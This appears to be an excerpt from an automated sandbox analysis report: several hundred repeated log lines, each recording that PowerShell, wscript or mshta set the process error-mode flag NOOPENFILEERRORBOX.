              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
